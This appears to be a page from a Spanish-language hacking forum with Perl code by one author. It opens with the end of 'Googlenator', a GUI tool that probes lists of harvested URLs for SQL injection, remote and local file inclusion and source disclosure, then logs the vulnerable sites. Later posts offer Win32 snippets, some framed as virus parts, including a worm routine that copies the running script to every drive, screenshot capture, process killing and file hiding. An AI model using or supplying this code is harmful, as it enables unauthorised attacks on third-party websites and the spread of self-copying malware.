sub loadsql {
 
$browse = $new->FileSelect(-directory => "/");
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;

$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
$new->update();
scansql($page);
}

sub scansql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
$box->insert("end","\t\t[+] SQLI : $page\n");
savefilevul("sql-logs.txt",$page);
}}}

sub loadrfi {
 
$browse = $new->FileSelect(-directory => "/");
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;

$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
$new->update();
scanrfi($page);
}

sub scanrfi {
my $page = shift;
$code1 = toma($page."http:/www.supertangas.com/");
if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD
$box->insert("end","\t\t[+] RFI : $page\n");
savefilevul("rfi-logs.txt",$page);
}}}

sub loadlfi {
 
$browse = $new->FileSelect(-directory => "/");
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;

$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
$new->update();
scanlfi($page);
}


sub scanlfi {
my $page = shift;
$code1 = toma($page."'");
if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
$box->insert("end","\t\t[+] LFI : $page\n");
savefilevul("lfi-logs.txt",$page);
}}}

sub loadfsd {
 
$browse = $new->FileSelect(-directory => "/");
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;

$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
$new->update();
scanfsd($page);
}

sub scanfsd {
my $page = shift;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) { 
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
$box->insert("end","\t\t[+] Full Source Discloure : $page\n");
savefilevul("fsd-logs.txt",$page);
}}}}

sub head {

$box->delete("0.0","end");

$box->insert("end","
           @@@@     @@@      @@@      @@@@   @@   @@@@ @@   @@    @@   @@@@@@  @@@    @@@@  
          @@@@@    @@@@@    @@@@@    @@@@@   @@   @@   @@@  @@    @@     @@   @@@@@   @@ @@ 
         @@@      @@   @@  @@   @@  @@@      @@   @@   @@@@ @@   @@@@    @@  @@   @@  @@ @@ 
         @@  @@@  @@   @@  @@   @@  @@  @@@  @@   @@@@ @@ @ @@   @  @    @@  @@   @@  @@@@  
         @@@  @@  @@   @@  @@   @@  @@@  @@  @@   @@   @@ @@@@  @@@@@@   @@  @@   @@  @@@@  
          @@@@@    @@@@@    @@@@@    @@@@@   @@   @@   @@  @@@  @@  @@   @@   @@@@@   @@ @@ 
           @@@      @@@      @@@      @@@    @@@@ @@@@ @@   @@  @@  @@   @@    @@@    @@  @@



	
");
}

sub about {
$about = MainWindow->new(-background=>"black");
$about->title("Googlenator v0.3");
$about->geometry("300x110");
$about->resizable(0,0);
$about->Label(-background=>"black",-foreground=>"cyan")->pack();
$about->Label(-text=>"Contact : lepuke[at]hotmail[com]",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
$about->Label(-text=>"Web : doddyhackman.webcindario.com",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
$about->Label(-text=>"Blog : doddy-hackman.blogspot.com",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
}

sub exitx {
exit(1);
}

sub savefilevul {
open (SAVE,">>logs/vulz/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}

sub toma {
return $nave->get($_[0])->content;
}

sub dame_link {
return $nave->find_all_links();
}

sub clean {
if ($_[0] =~/\=/) {
my @sacar= split("=",$_[0]);
return(@sacar[0]."=");
}
}

sub savefile {
open (SAVE,">>logs/search/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}

sub google {

for ($pages=10;$pages<=$_[2];$pages=$pages+10) {
$new->update();
toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
@links = dame_link();
for my $l(@links) {
if ($l->url() =~/webcache.googleusercontent.com/) {
push(@url,$l->url());
}
}
}

for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}

my @founds = repes(@founds);

return @founds; 
}


sub installer {

unless (-d "logs/") {
mkdir("logs/","777");
mkdir("logs/search","777");
mkdir("logs/vulz","777");
}
}

sub repes {
foreach my $palabra ( @_ ) {
next if $repety{ $palabra }++;
push @revisado,$palabra;
}
return @revisado;
}

sub loadgoogle {
system("start ".getcwd()."/logs/search/");
}

sub loadfilesql {
system("start logs/vulz/sql-logs.txt");
}


sub loadfilelfi {
system("start logs/vulz/lfi-logs.txt");
}


sub loadfilerfi {
system("start logs/vulz/rfi-logs.txt");
}


sub loadfilefsd {
system("start logs/vulz/fsd-logs.txt");
}

# ¿ The End ?

#347

Perl / [Perl] Funcion writeword()

Julio 03, 2011, 09:45:38 PM

Hola , con esta funcion podran ejecutar word y escribir el texto que quieran, muy
util si quieren hacer un virus

Código: perl


#By Doddy H

use Win32::Clipboard;
use Win32::GuiTest qw(FindWindowLike SetForegroundWindow SendKeys);

sub loadword {

system("start winword.exe");

sleep 4;

SendKeys($_[0]); 

}

Ejemplo de uso

Código: perl


loadword("Hola a todos");

#348

Perl / [Perl] Funcion wormer()

Julio 03, 2011, 09:45:25 PM

con esta funcion podran reproducir un archivo por todas las unidades disponibles

Código: perl


#ascii chr(65) = A | chr(90) = Z
#By Doddy H

use File::Copy;

sub wormear {
for my $dir(65..90) {
copy($0,chr($dir).":/");
}
}

Ejemplo de uso

Código: perl



wormear($0);

#349

Perl / [Perl] Funcion Speak()

Julio 03, 2011, 09:45:15 PM

Hola a todos , con esta simple funcion vamos a lograr que nuestra computadora logre hablar y nos
diga lo que queremos , aunque solo puede hablar bien en ingles

Código: perl


#By Doddy H

use Win32::OLE;

sub speak {


my $habla = Win32::OLE->new("SAPI.SpVoice");

$habla->Speak($_[0],0);

}

Ejemplo de uso

Código: perl


speak("Hi brother");

#350

Perl / [Perl] Funcion screensave()

Julio 03, 2011, 09:45:05 PM

Hola a todos.

Con este funcion podran sacar una foto del sistema

Código: perl



#By Doddy H

use Win32::Clipboard;
use Win32::GuiTest qw(FindWindowLike SetForegroundWindow SendKeys);

capture_window();

sub capture_window {

SendKeys("%{PRTSCR}"); 

my $a = Win32::Clipboard::GetBitmap();

open (FOTO,">foto.bmp");
binmode(FOTO);
print FOTO $a;
close FOTO;

}

Ejemplo de uso

Código: perl


capture_window()

Y tendran la foto con el nombre de foto.bmp

#351

Perl / [Perl] Funcion savefile()

Julio 03, 2011, 09:44:43 PM

Hola , con esta funcion podran crear un archivo y escribir en el
Si el archivo ya existe solo escribe y no lo borra

Código: perl


#By Doddy H
sub savefile {
open (SAVE,">>".$_[0]);
print SAVE $_[1];
close SAVE; 
}

Ejemplo de uso

Código: perl


savefile("C:\\Windows\\Logs\\file.txt","hola")

#352

Perl / [Perl] Funcion printear()

Julio 03, 2011, 09:44:33 PM

Hola a todos , hoy les traigo una funcion para poder
usar colores en perl para mostrar en el texto que queremos

Código: perl


#By Doddy H

use Color::Output;
Color::Output::Init;

sub printear {
if ($_[1] eq "text") {
cprint("\x03".$_[2].$_[0]."\x030\n");
}
elsif ($_[1] eq "stdin") {
if ($_[3] ne "") {
cprint("\x03".$_[2].$_[0]."\x030"."\x03".$_[3]);
my $op = <stdin>;
chomp $op;
cprint ("\x030");
return $op;
}
}
else {
print "error\n";
}
}

Sintasis

Código: perl


printear("text","text/stdin","color text","color output")

Ejemplos de uso

Con texto normal

Código: perl


printear("hola","text","10","5");

Texto con entrada de teclado

Código: perl


my $d  = printear("nombre : ","stdin","6","2");
print "pusiste $d\n";

#353

Perl / [Perl] Funcion movewin()

Julio 03, 2011, 09:44:23 PM

Bueno , con esta funcion podran volver loca a una ventana para
que se mueva de formas maleficas

Código: perl


#By Doddy H
use Win32::API;

sub movewin {
for my $n(1..20) {
Win32::API->new("user32","SetWindowPos",[qw(N N N N N NN)],'N')->Call($_[0],$n,$n,$n,$n,$n,$n);
}
}

Ejemplo de uso

Código: perl


movewin(id ventana);

#354

Perl / [Perl] Funcion killprocess()

Julio 03, 2011, 09:44:12 PM

Hola a todos , aca les traigo un funcion para
cerrar el proceso que odien marcando el nombre y el pid

Código: perl


use Win32::Process;

sub killprocess {

my ($numb,$pid) = @_;

if (Win32::Process::KillProcess($pid,$numb)) {
return true;
} else {
return false;
}
}

Ejemplo de uso

Código: perl


if (killprocess("deamon.exe","4052")) {
print "chau\n\a";
}

#355

Perl / [Perl] Funcion hideit()

Julio 03, 2011, 09:43:57 PM

Con esta funcion podran esconder o mostraR archivos/directorios
ocultos en windows

Código: perl


#By Doddy H
use Win32::File;

sub hideit {
if ($_[1] eq "show") {
Win32::File::SetAttributes($_[0],NORMAL);
}
elsif ($_[1] eq "hide") {
Win32::File::SetAttributes($_[0],HIDDEN);
}
else {
print "error\n";
}
}

Ejemplo de uso show/hide

Código: perl


hideit("test.pl","show");

#356

Perl / [Perl] Funcion getprocess()

Julio 03, 2011, 09:43:46 PM

HOla aca les traigo una funcion que les mostrara los
procesos en su computadora

Código: perl


use Win32::OLE qw(in);

sub getprocess {

my %procesos;

my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
my $dos = $uno->ConnectServer("","root\\cimv2");

foreach my $pro (in $dos->InstancesOf("Win32_Process")){
$procesos{$pro->{Caption}} = $pro->{ProcessId};
}
return %procesos;
}

Ejemplo de uso

Código: perl


my %vida = getprocess();

for my $data(keys %vida) {
print "[Proceso] : ".$data."\n";
print "[PID] : ".$vida{$data}."\n\n";
}

#357

Perl / [Perl] Funcion getmyip()

Julio 03, 2011, 09:41:33 PM

Hola a todos.

Aca les dejo una funcion que hice para reconocer
nuestra IP sin necesidad de usar paginas webs con ese molesto
servicio online

Código: perl


#By Doddy H
use IO::Socket;

sub get_ip {
my $get = gethostbyname("");
return inet_ntoa($get);
}

Ejemplo de uso

Código: perl


print get_ip();

#358

Perl / [Perl] Funcion getlink()

Julio 03, 2011, 09:41:22 PM

Hola a les traigo un funcion para buscar
links en una web

Código: perl


use HTML::LinkExtor;

sub get_links {

$test = HTML::LinkExtor->new(\&agarrar)->parse($code);
return @links;

sub agarrar {
my ($a,%b) = @_;
push(@links,values %b); 
}
}

Ejemplo de uso

Código: perl


use LWP::Simple;

$code = get("http://127.0.0.1/doddy/index.php");

my @ver = get_links();

for my $url(@ver) {
print $url."\n";
}

#359

Perl / [Perl] Funcion getdrive()

Julio 03, 2011, 09:41:09 PM

Con esta funcion podran tener el tipo de disco que se e esta ejecutando
actualmente (c:/ o el que sea)

Código: perl


#By Doddy H
use Cwd;


sub getdrive {

$path = getcwd();

if ($path=~/(.*):\/\//ig or $path=~/(.*):\//) {
return $1.":/";
} 

}

Ejemplo de uso

Código: perl


print getdrive();

#360

Perl / [Perl] Funcion download()

Julio 03, 2011, 09:40:55 PM

HOla aca les traigo una funcion para descargar
archivos

Código: perl


#!usr/bin/perl
#Simple downloader in Perl
#By Doddy H

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

sub download {
if ($nave->mirror($_[0],$_[1])) {
if (-f $_[1]) {
return true;
}}}

Sintasis

Código: text


download(url a bajar,nombre de archivo con el que se guarda);

Ejemplo de uso

Código: perl


if (download("http://127.0.0.1/bones.rar","bones.rar")) {
print "[+] file downloaded\n";
}

Páginas 1 ... 7 8 9 10